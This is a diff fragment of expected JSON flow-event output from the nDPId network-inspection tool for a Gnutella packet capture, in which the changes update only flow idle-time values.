+00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68108,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72853,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"172.97.199.14","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72853,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"172.97.199.14","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":312957,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.115.218.152","src_port":28681,"dst_port":5900,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":312957,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.115.218.152","src_port":28681,"dst_port":5900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72849,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.69.159.133","src_port":28681,"dst_port":28000,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72849,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.69.159.133","src_port":28681,"dst_port":28000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66077,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.244.64.237","src_port":50215,"dst_port":4704,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":50230,"dst_port":17296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287311,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.210.244.72","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":287311,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.210.244.72","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":70230,"flow_last_seen":433135,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.138.20.110","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":70230,"flow_last_seen":433135,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.138.20.110","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89732,"flow_last_seen":98763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":50288,"dst_port":20347,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89732,"flow_last_seen":98763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":50288,"dst_port":20347,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64033,"flow_last_seen":73064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64033,"flow_last_seen":73064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89732,"flow_last_seen":98763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":50288,"dst_port":20347,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89732,"flow_last_seen":98763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":50288,"dst_port":20347,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64033,"flow_last_seen":73064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":64033,"flow_last_seen":73064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82061,"flow_last_seen":493284,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.131.24.72","src_port":28681,"dst_port":30711,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82061,"flow_last_seen":493284,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.131.24.72","src_port":28681,"dst_port":30711,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":99,"flow_first_seen":71205,"flow_last_seen":593737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":6090,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90744,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":50305,"dst_port":63637,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":99,"flow_first_seen":71205,"flow_last_seen":593737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":6090,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":520019,"flow_last_seen":523077,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72852,"flow_last_seen":491978,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.250.99.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72852,"flow_last_seen":491978,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.250.99.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 